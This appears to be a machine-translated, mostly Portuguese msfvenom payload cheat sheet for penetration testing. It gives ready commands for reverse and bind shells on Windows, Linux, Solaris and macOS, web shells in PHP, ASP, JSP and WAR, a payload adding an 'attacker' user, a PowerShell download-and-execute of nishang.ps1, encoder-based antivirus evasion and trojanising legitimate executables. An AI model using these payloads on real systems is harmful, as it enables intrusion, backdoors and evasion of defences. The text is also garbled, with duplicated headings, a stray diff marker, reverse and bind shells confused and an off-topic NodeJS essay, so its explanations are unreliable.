A técnica de Reverse Shell é usada para estabelecer uma conexão de rede reversa entre o alvo e o atacante. Isso permite que o atacante assuma o controle do sistema alvo remotamente. O Metasploit Framework fornece uma ferramenta chamada `msfvenom` que pode ser usada para gerar payloads de Reverse Shell para sistemas Windows.
### **Shell Reverso**
#### **Gerando um Payload de Reverse Shell**
Para gerar um payload de Reverse Shell usando o `msfvenom`, você precisa especificar o tipo de payload, o endereço IP do atacante e a porta que será usada para a conexão reversa. Aqui está o comando básico para gerar um payload de Reverse Shell para o Windows:
```
msfvenom -p windows/shell_reverse_tcp LHOST=<IP_DO_ATACANTE> LPORT=<PORTA> -f exe > shell.exe
```
Substitua `<IP_DO_ATACANTE>` pelo endereço IP do atacante e `<PORTA>` pela porta que você deseja usar para a conexão reversa.
Depois de executar o comando, o `msfvenom` gerará um arquivo executável chamado `shell.exe`, que será o payload de Reverse Shell.
#### **Executando o Payload de Reverse Shell**
Depois de gerar o payload de Reverse Shell, você precisa executá-lo no sistema alvo. Existem várias maneiras de fazer isso, dependendo do contexto e do acesso ao sistema alvo.
Uma maneira comum de executar o payload de Reverse Shell é enviá-lo para o sistema alvo por meio de um vetor de ataque, como um arquivo malicioso anexado a um e-mail ou um link de download falso. Quando o usuário alvo abrir o arquivo ou clicar no link, o payload será executado e estabelecerá uma conexão reversa com o atacante.
Outra opção é usar uma técnica de exploração para injetar o payload de Reverse Shell em um processo em execução no sistema alvo. Isso pode ser feito aproveitando uma vulnerabilidade conhecida no sistema ou em um aplicativo em execução.
Independentemente do método escolhido, uma vez que o payload de Reverse Shell seja executado no sistema alvo, ele tentará estabelecer uma conexão reversa com o endereço IP e a porta especificados durante a geração do payload. O atacante pode então usar uma ferramenta como o Metasploit Framework para interagir com o sistema alvo e executar comandos remotamente.
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
```
### Bind Shell
Uma shell de ligação é uma técnica de invasão que permite que um invasor assuma o controle de um sistema remoto abrindo uma porta de escuta em um servidor e aguardando que uma conexão seja estabelecida. Quando a conexão é estabelecida, o invasor pode executar comandos no sistema remoto como se estivesse sentado na frente dele.
Uma bind shell é um tipo de shell reversa que permite que um invasor se conecte a um sistema comprometido e obtenha acesso ao shell do sistema. Ao contrário de uma shell reversa, onde o invasor inicia a conexão, em uma bind shell o sistema comprometido aguarda por uma conexão do invasor.
O Metasploit Framework fornece uma maneira fácil de criar uma shell de ligação usando o módulo `msfvenom`. O comando abaixo cria uma shell de ligação do Windows que se conecta à porta 4444:
O `msfvenom` é uma ferramenta poderosa do Metasploit Framework que permite gerar payloads personalizados para exploração de vulnerabilidades. Com o `msfvenom`, é possível criar um payload para uma bind shell e injetá-lo em um sistema alvo.
A sintaxe básica para gerar um payload de bind shell usando o `msfvenom` é a seguinte:
```
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe > shell.exe
msfvenom -p <payload> LHOST=<seu endereço IP> LPORT=<porta> -f <formato> -o <arquivo de saída>
```
Este comando cria um arquivo executável chamado `shell.exe` que, quando executado em um sistema Windows, abrirá uma porta de escuta na porta 4444 e aguardará uma conexão. O invasor pode então se conectar à porta usando uma ferramenta como o `netcat` e assumir o controle do sistema remoto.
- `<payload>`: o payload específico que você deseja usar, como `windows/meterpreter/reverse_tcp` ou `linux/x86/meterpreter/reverse_tcp`.
- `<seu endereço IP>`: o endereço IP do seu sistema.
- `<porta>`: a porta que será usada para a conexão.
- `<formato>`: o formato de saída desejado, como `exe`, `elf` ou `raw`.
- `<arquivo de saída>`: o nome do arquivo de saída onde o payload será salvo.
Por exemplo, para gerar um payload de bind shell para um sistema Windows, usando o payload `windows/meterpreter/reverse_tcp`, com seu endereço IP sendo `192.168.0.100` e a porta `4444`, no formato `exe` e salvando-o como `payload.exe`, você pode usar o seguinte comando:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f exe -o payload.exe
```
Depois de gerar o payload, você pode implantá-lo no sistema alvo e iniciar uma conexão reversa usando uma ferramenta como o Metasploit Framework. Isso permitirá que você obtenha acesso ao shell do sistema comprometido e execute comandos nele.
```bash
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
```
### Criar Usuário
To create a user, you can use the `msfvenom` tool in Metasploit. The `msfvenom` tool allows you to generate various types of payloads, including shellcode, which can be used to create a user on a target system.
Here is an example command to create a user using `msfvenom`:
```plaintext
msfvenom -p windows/adduser USER=username PASS=password -f exe > adduser.exe
```
This command will generate an executable file called `adduser.exe` that, when executed on a Windows system, will create a new user with the specified username and password.
You can customize the payload by changing the `USER` and `PASS` parameters to the desired username and password, respectively. Additionally, you can modify the output format (`-f`) to suit your needs.
Remember to use this technique responsibly and only on systems that you have proper authorization to access.
```bash
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
```
### Shell CMD
O shell CMD é um shell de comando do Windows que permite aos usuários interagir com o sistema operacional por meio de comandos de texto. É uma ferramenta poderosa para executar tarefas administrativas e automatizar processos no Windows.
O shell CMD pode ser usado para executar comandos, scripts e programas no Windows. Ele fornece uma interface de linha de comando para executar várias operações, como criar, copiar, excluir e renomear arquivos, gerenciar serviços, configurar redes e muito mais.
O shell CMD também suporta variáveis de ambiente, que podem ser usadas para armazenar valores e passá-los para comandos e scripts. Isso permite a criação de scripts mais avançados e automatizados.
Para abrir o shell CMD, você pode pressionar a tecla Windows + R e digitar "cmd" ou pesquisar por "Prompt de Comando" no menu Iniciar. Isso abrirá uma janela de comando onde você pode digitar os comandos desejados.
O shell CMD é uma ferramenta essencial para administradores de sistemas e usuários avançados do Windows, pois oferece uma maneira eficiente de interagir com o sistema operacional e executar tarefas de forma rápida e eficaz.
```bash
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
```
### **Executar Comando**
#### **Descrição**
The `msfvenom` tool can be used to generate payloads that allow for command execution on a target system. This can be useful during a penetration test to gain remote access and control over the target.
O payload de execução de comando permite que o invasor execute comandos arbitrários no sistema de destino.
#### **Sintaxe**
To generate a payload that executes a command, you can use the following command:
```
msfvenom -p cmd/unix/reverse_{perl,python,bash,ruby} LHOST=<attacker IP> LPORT=<attacker port> -f <format> > shell.{<format>}
msfvenom -p cmd/unix/reverse_netcat LHOST=<attacker IP> LPORT=<attacker port> -f <output format> -o <output file>
```
#### **Exemplo**
Replace `<attacker IP>` with the IP address of the machine running the listener, and `<attacker port>` with the port number on which the listener is running.
```
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.100 LPORT=4444 -f raw > shell.sh
```
The `<output format>` can be any format supported by `msfvenom`, such as `raw`, `elf`, `exe`, `dll`, `psh`, `asp`, `jsp`, `war`, `pl`, `py`, `rb`, `ps1`, `hta`, `c`, `cpp`, `java`, `msi`, `msu`, `vba`, `vbs`, `hta-psh`, `asp-psh`, `jsp-psh`, `war-psh`, `pl-psh`, `py-psh`, `rb-psh`, `ps1-psh`, `c-psh`, `cpp-psh`, `java-psh`, `msi-psh`, `msu-psh`, `vba-psh`, or `vbs-psh`.
Este comando criará um payload que, quando executado no sistema de destino, se conectará ao endereço IP do atacante na porta especificada e permitirá que o invasor execute comandos arbitrários no sistema de destino. O payload será salvo em um arquivo chamado `shell.sh`.
The `<output file>` is the name of the file that will contain the generated payload.
Once the payload is generated, you can transfer it to the target system and execute it to gain command execution.
Note: It is important to ensure that you have proper authorization and legal permission before attempting to execute commands on a target system.
```bash
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
```
### Codificador
O codificador é uma ferramenta essencial no arsenal de um hacker. Ele é usado para ofuscar o payload e evitar a detecção pelos sistemas de segurança. O Metasploit Framework fornece uma variedade de codificadores que podem ser usados com o `msfvenom` para criar payloads personalizados.
#### Codificadores disponíveis
Aqui estão alguns dos codificadores disponíveis no Metasploit Framework:
- `x86/shikata_ga_nai`: Este codificador é baseado em metamorfose e é eficaz contra sistemas de detecção de assinaturas.
- `x86/jmp_call_additive`: Este codificador usa instruções `jmp` e `call` para ofuscar o payload.
- `x86/call4_dword_xor`: Este codificador usa instruções `call` e `xor` para ofuscar o payload.
#### Uso do codificador
Para usar um codificador com o `msfvenom`, você precisa especificar o codificador desejado usando a opção `-e` seguida pelo nome do codificador. Por exemplo, para usar o codificador `x86/shikata_ga_nai`, você pode usar o seguinte comando:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -e x86/shikata_ga_nai -f exe > payload.exe
```
Isso criará um payload do tipo `exe` usando o codificador `x86/shikata_ga_nai`.
#### Personalização do codificador
Você também pode personalizar o codificador especificando opções adicionais. Por exemplo, você pode definir o número de iterações usando a opção `-i`. Quanto maior o número de iterações, mais ofuscado será o payload. Você também pode usar a opção `-b` para especificar caracteres proibidos que devem ser evitados no payload.
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -e x86/shikata_ga_nai -i 5 -b '\x00\x0a\x0d' -f exe > payload.exe
```
Neste exemplo, o codificador `x86/shikata_ga_nai` será usado com 5 iterações e os caracteres nulos, de nova linha e de retorno de carro serão evitados no payload.
#### Conclusão
Os codificadores são ferramentas poderosas que podem ajudar a evitar a detecção de payloads pelos sistemas de segurança. Ao usar o `msfvenom`, você pode facilmente criar payloads personalizados com codificadores específicos para atender às suas necessidades.
```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
```
### Incorporado dentro de um executável
### Incorporado dentro do executável
O `msfvenom` pode ser usado para incorporar um payload dentro de um executável existente. Isso permite que você execute o payload sem chamar a atenção, pois ele estará oculto dentro do arquivo executável original.
Para incorporar um payload em um executável, você precisa especificar o tipo de payload, a arquitetura do sistema alvo, o formato do arquivo de saída e o nome do arquivo de entrada. Por exemplo, para incorporar um payload do tipo `windows/meterpreter/reverse_tcp` em um executável de 32 bits chamado `original.exe`, você pode usar o seguinte comando:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -f exe -a x86 --platform windows -x original.exe -k -o embedded.exe
```
Neste exemplo, o `msfvenom` criará um novo arquivo chamado `embedded.exe`, que conterá o payload incorporado. Quando o `embedded.exe` for executado no sistema alvo, o payload será ativado e estabelecerá uma conexão reversa com o endereço IP e porta especificados.
Certifique-se de que o executável original seja compatível com a arquitetura do sistema alvo e que você tenha permissão legal para incorporar um payload nele. O uso indevido dessa técnica pode ser ilegal e violar a privacidade e a segurança de terceiros.
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
```
## Cargas úteis do Linux
### Shell Reverso
O shell reverso é uma técnica comumente usada em testes de penetração para obter acesso remoto a um sistema Linux. Ele permite que um invasor estabeleça uma conexão de rede reversa com a máquina alvo, fornecendo assim controle total sobre o sistema.
#### Gerando um Payload com o msfvenom
O msfvenom é uma ferramenta poderosa do Metasploit Framework que permite gerar payloads personalizados para várias plataformas. Para gerar um payload de shell reverso para Linux, você pode usar o seguinte comando:
```plaintext
msfvenom -p <payload> LHOST=<seu endereço IP> LPORT=<porta> -f <formato> -o <nome do arquivo de saída>
```
Substitua `<payload>` pelo payload desejado, `<seu endereço IP>` pelo seu endereço IP público ou privado, `<porta>` pela porta que você deseja usar para a conexão reversa, `<formato>` pelo formato de saída desejado (por exemplo, elf, raw, etc.) e `<nome do arquivo de saída>` pelo nome do arquivo de saída desejado.
#### Exemplo
Aqui está um exemplo de comando para gerar um payload de shell reverso para Linux usando o msfvenom:
```plaintext
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f elf -o reverse_shell.elf
```
Neste exemplo, estamos gerando um payload de shell reverso para Linux na arquitetura x86, com o endereço IP do host sendo 192.168.0.10 e a porta sendo 4444. O formato de saída escolhido é ELF e o arquivo de saída será chamado reverse_shell.elf.
#### Executando o Payload
Depois de gerar o payload, você pode transferi-lo para o sistema alvo e executá-lo. Uma vez executado, o payload estabelecerá uma conexão reversa com o seu sistema, permitindo que você interaja com o sistema alvo remotamente.
Para receber a conexão reversa, você pode usar uma variedade de ferramentas, como o netcat ou o Metasploit Framework. Certifique-se de configurar corretamente o endereço IP e a porta para receber a conexão reversa.
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
```
### Bind Shell
Uma shell de ligação é uma técnica de invasão que permite que um invasor assuma o controle de um sistema remoto abrindo uma porta de escuta em um servidor e aguardando que uma conexão seja estabelecida. Quando a conexão é estabelecida, o invasor pode executar comandos no sistema remoto como se estivesse sentado na frente dele.
Uma bind shell é um tipo de shell reversa que permite que um invasor se conecte a um sistema comprometido e obtenha acesso ao shell do sistema. Ao contrário de uma shell reversa, onde o invasor inicia a conexão, em uma bind shell, o sistema comprometido aguarda por uma conexão de entrada do invasor.
O Metasploit Framework fornece uma maneira fácil de criar uma shell de ligação usando o módulo `msfvenom`. O comando abaixo cria uma shell de ligação do Windows que se conecta à porta 4444:
O `msfvenom` é uma ferramenta poderosa que pode ser usada para gerar payloads para shells bind. Ele permite que você personalize o payload de acordo com suas necessidades, como o endereço IP e a porta que o sistema comprometido irá aguardar por conexões.
Aqui está um exemplo de como usar o `msfvenom` para gerar um payload para uma bind shell:
```
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe > shell.exe
```
Este comando cria um arquivo executável chamado `shell.exe` que, quando executado em um sistema Windows, abrirá uma porta de escuta na porta 4444 e aguardará uma conexão. O invasor pode então se conectar à porta usando uma ferramenta como o `netcat` e assumir o controle do sistema remoto.
Neste exemplo, estamos gerando um payload para uma bind shell no Windows, que irá aguardar por conexões na porta 4444. O payload é salvo em um arquivo chamado `shell.exe`.
Depois de gerar o payload, você pode transferi-lo para o sistema comprometido e executá-lo. Uma vez que o payload é executado, o sistema comprometido estará aguardando por uma conexão do invasor na porta especificada. O invasor pode então se conectar ao sistema comprometido usando uma ferramenta como o `netcat` e obter acesso ao shell do sistema.
É importante lembrar que o uso de bind shells para fins maliciosos é ilegal e antiético. Este conhecimento deve ser usado apenas para fins educacionais e em um ambiente controlado, como parte de um teste de penetração autorizado.
```bash
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
```
### SunOS (Solaris)
O SunOS (também conhecido como Solaris) é um sistema operacional Unix desenvolvido pela Sun Microsystems, agora parte da Oracle Corporation. É amplamente utilizado em servidores corporativos e data centers. O Solaris é conhecido por sua segurança e estabilidade, o que o torna um alvo atraente para hackers que desejam comprometer sistemas de alto valor.
O SunOS (Solaris) é um sistema operacional baseado em Unix desenvolvido pela Sun Microsystems. Ele é amplamente utilizado em servidores e estações de trabalho. O Solaris oferece uma plataforma estável e segura para executar aplicativos críticos de negócios.
#### Compilando um payload para o Solaris
O `msfvenom` é uma ferramenta poderosa que permite gerar payloads personalizados para várias plataformas, incluindo o Solaris. Aqui está um exemplo de como compilar um payload para o Solaris usando o `msfvenom`:
```plaintext
msfvenom -p solaris/x86/shell_reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -f elf > payload.elf
```
Neste exemplo, estamos usando o payload `solaris/x86/shell_reverse_tcp`, que cria uma conexão reversa TCP para o seu endereço IP e porta especificados. Certifique-se de substituir `<seu endereço IP>` pelo seu endereço IP real e `<sua porta>` pela porta desejada.
Depois de executar o comando acima, o `msfvenom` irá gerar o payload e salvá-lo em um arquivo chamado `payload.elf`. Este arquivo pode ser transferido para o sistema Solaris alvo e executado para estabelecer uma conexão reversa com o seu sistema.
#### Executando o payload no Solaris
Para executar o payload no Solaris, você pode usar o comando `nc` (netcat) para ouvir a porta especificada no payload:
```plaintext
nc -l -p <sua porta>
```
Em seguida, transfira o arquivo `payload.elf` para o sistema Solaris alvo e execute-o:
```plaintext
./payload.elf
```
Isso irá iniciar o payload e estabelecer uma conexão reversa com o seu sistema. Você poderá interagir com o shell remoto e executar comandos no sistema Solaris alvo.
#### Considerações finais
Ao compilar e executar payloads no Solaris, é importante garantir que você tenha permissões adequadas e esteja agindo dentro dos limites legais. O uso indevido de técnicas de hacking pode ser ilegal e sujeito a penalidades. Certifique-se de obter autorização adequada antes de realizar qualquer atividade de pentesting ou hacking.
```bash
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
```
## **Cargas Úteis MAC**
### **Shell Reverso:**
O shell reverso é uma técnica comum usada em pentest para estabelecer uma conexão de rede reversa entre o alvo e o atacante. Isso permite que o atacante assuma o controle do sistema comprometido e execute comandos remotamente.
O `msfvenom` é uma ferramenta poderosa que faz parte do framework Metasploit. Ele permite gerar payloads personalizados para várias plataformas, incluindo o macOS.
Aqui está um exemplo de como gerar um payload de shell reverso para o macOS usando o `msfvenom`:
```plaintext
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -f macho > shell.macho
```
Neste exemplo, substitua `<seu endereço IP>` pelo endereço IP do seu servidor de escuta e `<sua porta>` pela porta que você deseja usar para a conexão reversa.
Depois de gerar o payload, você pode implantá-lo no sistema de destino e iniciar o servidor de escuta para receber a conexão reversa.
Lembre-se de que o uso de técnicas de hacking sem permissão é ilegal e pode ter consequências graves. Certifique-se de obter a devida autorização antes de realizar qualquer teste de penetração.
```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
```
### **Shell de Bind**
A **Bind Shell** is a type of shell that listens for incoming connections on a specific port. Once a connection is established, the shell provides a command-line interface to interact with the target system. This type of shell is commonly used in scenarios where the attacker has control over the target's network and wants to establish a persistent backdoor.
A shell de bind é uma técnica de invasão que permite ao invasor abrir um shell em uma porta específica do sistema alvo e aguardar que o alvo se conecte a essa porta para estabelecer uma conexão. Isso permite que o invasor assuma o controle do sistema alvo e execute comandos nele. O `msfvenom` pode ser usado para gerar payloads de shell de bind para várias arquiteturas e sistemas operacionais.
To create a bind shell payload using **msfvenom**, you can use the following command:
```plaintext
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<port> -f <format> -o <output file>
```
- `<payload>`: The payload to use, such as `windows/meterpreter/reverse_tcp` or `linux/x86/shell/bind_tcp`.
- `<attacker IP>`: The IP address of the attacker machine.
- `<port>`: The port number to listen on.
- `<format>`: The output format, such as `exe`, `elf`, or `raw`.
- `<output file>`: The file to save the generated payload.
For example, to create a bind shell payload for a Windows target, listening on port 4444, and save it as an executable file named `payload.exe`, you can use the following command:
```plaintext
msfvenom -p windows/meterpreter/bind_tcp LHOST=<attacker IP> LPORT=4444 -f exe -o payload.exe
```
Remember to replace `<attacker IP>` with your actual IP address.
Once the payload is generated, you can transfer it to the target system and execute it to establish the bind shell.
```bash
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
```
## **Cargas úteis baseadas na Web**
## **Cargas úteis baseadas na web**
### **PHP**
@ -170,101 +367,203 @@ msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
```
### ASP/x
O seguinte é um exemplo de um shell reverso em ASP/x:
#### Shell reverso
#### Descrição
O payload ASP/x é um payload do Metasploit que permite a execução de um shell reverso em sistemas Windows que possuem o IIS (Internet Information Services) instalado. O shell reverso permite que um atacante obtenha acesso remoto ao sistema comprometido.
#### Sintaxe
A sintaxe básica do payload ASP/x é a seguinte:
```
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f asp > shell.asp
```asp
<%@ Language=VBScript %>
<%
Dim cmd
cmd = Request.QueryString("cmd")
If cmd <> "" Then
Dim oShell
Set oShell = CreateObject("WScript.Shell")
Dim oExec
Set oExec = oShell.Exec(cmd)
Dim output
output = oExec.StdOut.ReadAll()
Response.Write(output)
End If
%>
```
#### Parâmetros
Este código permite executar comandos no servidor alvo através de uma solicitação GET. Para usar o shell reverso, você precisa enviar uma solicitação GET com o parâmetro `cmd` contendo o comando que deseja executar. O resultado do comando será retornado como resposta.
- `-p windows/shell_reverse_tcp`: especifica o payload a ser usado.
- `LHOST`: endereço IP do atacante.
- `LPORT`: porta do atacante.
#### Exemplo
O exemplo a seguir cria um payload ASP/x que se conecta ao endereço IP `192.168.0.10` na porta `4444`:
Para criar um payload ASP/x usando o `msfvenom`, você pode usar o seguinte comando:
```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f asp > shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -f asp > shell.asp
```
Substitua `<seu endereço IP>` pelo seu endereço IP e `<sua porta>` pela porta que deseja usar para a conexão reversa.
Depois de gerar o payload, você pode fazer o upload do arquivo `shell.asp` para o servidor alvo e acessá-lo através de uma solicitação GET para obter acesso ao shell reverso. Certifique-se de que o servidor esteja configurado para executar arquivos ASP/x.
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
```
### JSP
O seguinte é um exemplo de um shell reverso em JSP usando o msfvenom:
#### Shell reverso
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<seu endereço IP> LPORT=<sua porta> -f war > shell.war
```
Este comando irá gerar um arquivo WAR chamado `shell.war` que contém o shell reverso em JSP. Você pode implantar esse arquivo em um servidor web compatível com JSP para estabelecer uma conexão reversa com o seu sistema.
Certifique-se de substituir `<seu endereço IP>` pelo seu endereço IP e `<sua porta>` pela porta que você deseja usar para a conexão reversa.
Depois de implantar o arquivo WAR em um servidor web, você pode acessar o shell reverso em JSP usando o seguinte URL:
```
http://<endereço IP do servidor>/<caminho para o arquivo WAR>/shell.jsp
```
Isso permitirá que você execute comandos no sistema remoto através do shell reverso em JSP.
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
```
### WAR
A técnica de Reverse Shell é usada para estabelecer uma conexão entre o atacante e o alvo, permitindo que o atacante controle o sistema comprometido remotamente. O atacante envia um payload malicioso para o sistema alvo, que, quando executado, estabelece uma conexão de volta ao atacante. Isso permite que o atacante execute comandos no sistema alvo e obtenha acesso remoto completo.
#### Shell Reverso
O Metasploit Framework fornece uma ferramenta chamada `msfvenom` que pode ser usada para gerar payloads maliciosos para diferentes tipos de shells reversos. O `msfvenom` permite personalizar o payload de acordo com as necessidades do atacante, como o tipo de shell reverso, o endereço IP e a porta para a conexão de volta.
Aqui está um exemplo de como gerar um payload de shell reverso usando o `msfvenom`:
```plaintext
msfvenom -p <payload> LHOST=<seu endereço IP> LPORT=<sua porta> -f <formato> -o <arquivo de saída>
```
- `<payload>`: O tipo de payload que você deseja gerar, como `windows/meterpreter/reverse_tcp` ou `linux/x86/meterpreter/reverse_tcp`.
- `<seu endereço IP>`: O endereço IP do seu sistema, onde você deseja receber a conexão de volta.
- `<sua porta>`: A porta em que você deseja receber a conexão de volta.
- `<formato>`: O formato do payload, como `exe`, `elf` ou `raw`.
- `<arquivo de saída>`: O nome do arquivo de saída onde o payload será salvo.
Depois de gerar o payload, você pode enviá-lo para o sistema alvo e executá-lo. Assim que o payload for executado, uma conexão de shell reverso será estabelecida entre o sistema alvo e o seu sistema, permitindo que você execute comandos no sistema alvo remotamente.
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
```
### NodeJS
NodeJS é uma plataforma de desenvolvimento de software de código aberto que permite aos desenvolvedores criar aplicativos de rede escaláveis e de alta performance usando JavaScript. Ele é baseado no motor JavaScript V8 do Google Chrome e é executado em um ambiente de tempo de execução do lado do servidor. Com NodeJS, os desenvolvedores podem criar aplicativos de rede em tempo real, aplicativos de streaming de dados e aplicativos da web altamente escaláveis. Ele também é usado para criar ferramentas de linha de comando e scripts de automação.
NodeJS é uma plataforma de desenvolvimento de aplicativos de código aberto que permite a execução de JavaScript no lado do servidor. Ele utiliza o mecanismo de JavaScript do Chrome para fornecer um ambiente de execução rápido e eficiente. O NodeJS é amplamente utilizado para criar aplicativos web escaláveis e em tempo real, bem como para desenvolver ferramentas de linha de comando.
#### Benefícios do NodeJS
- **Desempenho**: O NodeJS é conhecido por seu desempenho excepcionalmente rápido devido ao seu modelo de E/S não bloqueante. Isso permite que o NodeJS lide com um grande número de conexões simultâneas sem sobrecarregar o servidor.
- **Escalabilidade**: O NodeJS é altamente escalável, permitindo que os aplicativos lidem com um grande número de solicitações simultâneas de forma eficiente. Ele também suporta a criação de aplicativos em tempo real, como bate-papos e jogos multiplayer.
- **Ecossistema robusto**: O NodeJS possui um ecossistema rico de pacotes e bibliotecas disponíveis através do gerenciador de pacotes npm. Isso facilita o desenvolvimento de aplicativos complexos, pois muitas funcionalidades já estão disponíveis como pacotes prontos para uso.
- **Facilidade de desenvolvimento**: O NodeJS utiliza JavaScript, uma linguagem de programação popular e amplamente conhecida, o que torna mais fácil para os desenvolvedores criar aplicativos web e APIs RESTful.
#### Desenvolvimento de Aplicativos com NodeJS
Para desenvolver aplicativos com NodeJS, você pode usar uma variedade de estruturas e bibliotecas, como o Express.js, que é um framework web minimalista e flexível. O Express.js simplifica o processo de criação de rotas, manipulação de solicitações e respostas, e gerenciamento de sessões.
Além disso, o NodeJS possui uma ampla gama de módulos integrados que fornecem funcionalidades adicionais, como o módulo `http` para criar um servidor HTTP, o módulo `fs` para manipulação de arquivos e o módulo `crypto` para criptografia.
#### Conclusão
O NodeJS é uma plataforma poderosa para o desenvolvimento de aplicativos web escaláveis e em tempo real. Com seu desempenho excepcional, escalabilidade e ecossistema robusto, o NodeJS se tornou uma escolha popular entre os desenvolvedores. Se você está procurando criar aplicativos web rápidos e eficientes, o NodeJS é definitivamente uma opção a ser considerada.
```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```
## **Cargas úteis de linguagem de script**
## **Cargas úteis de Linguagem de Script**
### **Perl**
O Perl é uma linguagem de script de alto nível que é usada principalmente para automação de tarefas e processamento de texto. O Metasploit Framework suporta a criação de cargas úteis em Perl usando o `msfvenom`. As cargas úteis em Perl são úteis para explorar vulnerabilidades em sistemas operacionais baseados em Unix. Para criar uma carga útil em Perl, use o seguinte comando:
```
msfvenom -p cmd/unix/reverse_perl LHOST=<attacker IP> LPORT=<attacker port> -f <format> > <output file>
```
Substitua `<attacker IP>` pelo endereço IP do atacante e `<attacker port>` pela porta que o atacante está ouvindo. O `<format>` pode ser qualquer formato suportado pelo `msfvenom`, como `raw`, `c`, `python`, `ruby`, `bash`, `exe`, `elf`, `dll`, `psh`, `jsp`, `war`, `asp`, `aspx`, `jsp`, `jspx`, `pl`, `pm`, `s`, `msi`, `hta`, `vba`, `vbs`, `hta-psh` ou `loop-vbs`. O `<output file>` é o nome do arquivo de saída que conterá a carga útil em Perl.
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
```
### **Python**
Python é uma linguagem de programação de alto nível, interpretada e orientada a objetos. É amplamente utilizada em hacking devido à sua facilidade de uso e grande quantidade de bibliotecas disponíveis. O Python pode ser usado para escrever scripts de automação, ferramentas de hacking e exploits. Além disso, muitas ferramentas de hacking populares, como o Metasploit Framework, são escritas em Python.
Python é uma linguagem de programação de alto nível, interpretada e de propósito geral. É amplamente utilizada no desenvolvimento de scripts, automação de tarefas, análise de dados e desenvolvimento de aplicativos web. A sintaxe simples e legível do Python torna-o uma escolha popular entre os programadores.
#### **Msfvenom**
Msfvenom é uma ferramenta poderosa e versátil do Metasploit Framework que permite a geração de payloads personalizados. Esses payloads podem ser usados para explorar vulnerabilidades em sistemas alvo durante testes de penetração.
A sintaxe básica do msfvenom é a seguinte:
```
msfvenom -p <payload> [opções]
```
Onde `<payload>` é o tipo de payload que você deseja gerar e `[opções]` são os parâmetros adicionais que você pode especificar para personalizar o payload.
#### **Gerando um payload do Windows reverse shell**
Um exemplo comum de uso do msfvenom é a geração de um payload do Windows reverse shell. Esse tipo de payload permite que um invasor estabeleça uma conexão reversa com o sistema alvo, fornecendo acesso remoto ao prompt de comando.
Aqui está um exemplo de comando para gerar um payload do Windows reverse shell usando o msfvenom:
```
msfvenom -p windows/shell_reverse_tcp LHOST=<seu endereço IP> LPORT=<porta> -f exe > payload.exe
```
Substitua `<seu endereço IP>` pelo seu endereço IP e `<porta>` pela porta que você deseja usar para a conexão reversa.
Depois de executar o comando, um arquivo chamado `payload.exe` será gerado. Esse arquivo pode ser implantado no sistema alvo para estabelecer a conexão reversa.
#### **Conclusão**
O msfvenom é uma ferramenta essencial para hackers éticos e profissionais de segurança cibernética. Com ele, é possível gerar payloads personalizados para explorar vulnerabilidades em sistemas alvo durante testes de penetração. É importante usar essa ferramenta com responsabilidade e apenas para fins legais e éticos.
```bash
